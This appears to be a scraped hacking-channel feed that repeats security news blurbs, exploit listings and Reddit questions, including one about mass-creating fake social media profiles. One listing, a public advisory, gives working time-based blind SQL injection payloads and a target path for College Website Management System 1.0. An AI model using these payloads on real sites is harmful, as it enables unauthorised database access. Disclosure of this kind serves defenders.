Hello everybody! This is my first medium post so I hope you like it.Continue reading on Medium » (https://medium.com/@c4rrilat0r/how-i-managed-to-trigger-xss-automatically-to-get-critical-account-takeover-92ea3abcaf9?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
How I managed to trigger XSS automatically to get critical account takeover
Hello everybody! This is my first medium post so I hope you like it.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
College Website Management System 1.0 SQL Injection
https://3.bp.blogspot.com/-Q0zmt52Iz_s/WWlvCi1SqRI/AAAAAAAAIKo/56GGQ_7zLBsvaLtYw9wmjI_Jb6z2oza2QCLcBGAs/s1600/h129.png
College Website Management System version 1.0 suffers from a remote SQL injection vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
College Website Management System 1.0 SQL Injection
https://3.bp.blogspot.com/-Q0zmt52Iz_s/WWlvCi1SqRI/AAAAAAAAIKo/56GGQ_7zLBsvaLtYw9wmjI_Jb6z2oza2QCLcBGAs/s1600/h129.png
College Website Management System version 1.0 suffers from a remote SQL injection vulnerability.
MD5 |
0d24d3675c92cd6b4566d20cd36be0d8Download
# Exploit Title: College Website Management System 1.0 - SQL Injection
# Date: 12/03/2022
# Exploit Author: Mr Empy
# Software Link:
https://www.sourcecodester.com/php/15203/college-website-content-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Linux
Title:
================
College Website Management System 1.0 - SQL Injection
Summary:
================
The College Website Management System application in version 1.0 is
vulnerable to SQL injection allowing the attacker to make requests to the
database.
Severity Level:
================
9.1 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Affected Product:
================
College Website Management System v1.0
Steps to Reproduce:
================
1. Open your browser and go to
http://target/cwms/admin/?page=articles/view_article&id=1.
2. In the "id" parameter add the following payload:
' and (select * from(select(sleep(10)))Avx) and 'abc' = 'abc
After that, the server will only respond after 10 seconds have passed.
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=articles/view_article&id=1' AND (SELECT 2016 FROM
(SELECT(SLEEP(5)))kbJu) AND 'SfwZ'='SfwZ
---
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
College Website Management System 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Laravel Media Library Pro 2.1.6 Shell Upload
https://4.bp.blogspot.com/-yT3eHciMBDw/WWlvGfUXh9I/AAAAAAAAILU/lYidSj08G0suEfC69x80tZFrj-NYN5F9wCLcBGAs/s1600/h137.png
Laravel Media Library Pro versions 2.1.6 and below as well as 1.17.10 and below suffer from a remote shell upload vulnerability.
MD5 |
Download
# Exploit Title: Laravel Media Library Pro <=2.1.6
# Google Dork: -
# Date: Mar 13, 2022
# Exploit Author: Kelvin Yip
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Laravel Media Library Pro 2.1.6 Shell Upload
https://4.bp.blogspot.com/-yT3eHciMBDw/WWlvGfUXh9I/AAAAAAAAILU/lYidSj08G0suEfC69x80tZFrj-NYN5F9wCLcBGAs/s1600/h137.png
Laravel Media Library Pro versions 2.1.6 and below as well as 1.17.10 and below suffer from a remote shell upload vulnerability.
MD5 |
1228b251a7f271fd7da635499b0bd342Download
# Exploit Title: Laravel Media Library Pro <=2.1.6
# Google Dork: -
# Date: Mar 13, 2022
# Exploit Author: Kelvin Yip
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Laravel Media Library Pro 2.1.6 Shell Upload
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
OneLayer Secures $8.2M Seed Round to Protect Private 5G Networks
OneLayer plans to use the funds to build its product suite.
___________________________
@hacking_Attack
@Hacking_Video
OneLayer Secures $8.2M Seed Round to Protect Private 5G Networks
OneLayer plans to use the funds to build its product suite.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
OneLayer Secures $8.2M Seed Round to Protect Private 5G Networks
OneLayer plans to use the funds to build its product suite.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Fortress Information Security’s New Trust Center Allows Suppliers to Bridge the Cyber Communication Gap with Patrons
Suppliers participating in the A2V Library now have a powerful new information-sharing tool.
___________________________
@hacking_Attack
@Hacking_Video
Fortress Information Security’s New Trust Center Allows Suppliers to Bridge the Cyber Communication Gap with Patrons
Suppliers participating in the A2V Library now have a powerful new information-sharing tool.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Fortress Information Security’s New Trust Center Allows Suppliers to Bridge the Cyber Communication Gap with Patrons
Suppliers participating in the A2V Library now have a powerful new information-sharing tool.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
SecZetta Launches Complimentary Third-Party Identity Risk Maturity Assessment at HIMSS
___________________________
@hacking_Attack
@Hacking_Video
SecZetta Launches Complimentary Third-Party Identity Risk Maturity Assessment at HIMSS
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
SecZetta Launches Complimentary Third-Party Identity Risk Maturity Assessment at HIMSS
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Praetorian Launches Chariot Total Attack Life Cycle Solution
New platform combines AI-based attack surface management automation with offensive security managed services to identify exposures and prioritize risk management.
___________________________
@hacking_Attack
@Hacking_Video
Praetorian Launches Chariot Total Attack Life Cycle Solution
New platform combines AI-based attack surface management automation with offensive security managed services to identify exposures and prioritize risk management.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Praetorian Launches Chariot Total Attack Life Cycle Solution
New platform combines AI-based attack surface management automation with offensive security managed services to identify exposures and prioritize risk management.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Incognia Introduces New Location Identity Fraud Detection Tools
Modules include Location Spoofing Detection, Global Mobile Address Validation, and Trusted Device Intelligence.
___________________________
@hacking_Attack
@Hacking_Video
Incognia Introduces New Location Identity Fraud Detection Tools
Modules include Location Spoofing Detection, Global Mobile Address Validation, and Trusted Device Intelligence.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Incognia Introduces New Location Identity Fraud Detection Tools
Modules include Location Spoofing Detection, Global Mobile Address Validation, and Trusted Device Intelligence.
How I managed to trigger XSS automatically to get critical account takeover
Hello everybody! This is my first medium post so I hope you like it.Continue reading on Medium »
Read more...
Hello everybody! This is my first medium post so I hope you like it.Continue reading on Medium »
Read more...
hacking: security in practice
How to fast make lots of fake profiles ?
Instagram
Facebook
Twitter
TikTok
submitted by /u/DannyBoyCZ
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
How to fast make lots of fake profiles ?
TikTok
submitted by /u/DannyBoyCZ
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
How to fast make lots of fake profiles ?
Instagram Facebook Twitter TikTok
hacking: security in practice
Social media stalker
So my sister is kinda big on social media and there’s someone stalking her through a fake Instagram page. They somehow hacked to find out her home address and are asking to meet up with her so it’s kinda scary. Are there any tips or tricks to find their real identity or general location? They don’t have any posts or pictures to go off of
submitted by /u/gildedbutterfly94
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Social media stalker
So my sister is kinda big on social media and there’s someone stalking her through a fake Instagram page. They somehow hacked to find out her home address and are asking to meet up with her so it’s kinda scary. Are there any tips or tricks to find their real identity or general location? They don’t have any posts or pictures to go off of
submitted by /u/gildedbutterfly94
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Social media stalker
So my sister is kinda big on social media and there’s someone stalking her through a fake Instagram page. They somehow hacked to find out her home...
hacking: security in practice
was my computers bios hacked? / injected with some sort of malware or root kit?
i randomly started up my computer today did not download any updates at all im on windows 10 and my hard drive is fully encypted with AES-256-Serpent using veryacrypt anyways i got this weird loading screen that says " HP BIOS UPDATE do not shut down the computer updating bios" since when did people get involuntary updates to their pc's bios?
was this an attempt from an attacker to take control of my computers boot loader/ bios?
submitted by /u/KillaX9
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
was my computers bios hacked? / injected with some sort of malware or root kit?
i randomly started up my computer today did not download any updates at all im on windows 10 and my hard drive is fully encypted with AES-256-Serpent using veryacrypt anyways i got this weird loading screen that says " HP BIOS UPDATE do not shut down the computer updating bios" since when did people get involuntary updates to their pc's bios?
was this an attempt from an attacker to take control of my computers boot loader/ bios?
submitted by /u/KillaX9
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
was my computers bios hacked? / injected with some sort of malware...
i randomly started up my computer today did not download any updates at all im on windows 10 and my hard drive is fully encypted with...
hacking: security in practice
How do you guys resist it?
The urge to log in to peoples accounts
submitted by /u/itsgonbeokayyeah
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
How do you guys resist it?
The urge to log in to peoples accounts
submitted by /u/itsgonbeokayyeah
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
How do you guys resist it?
The urge to log in to peoples accounts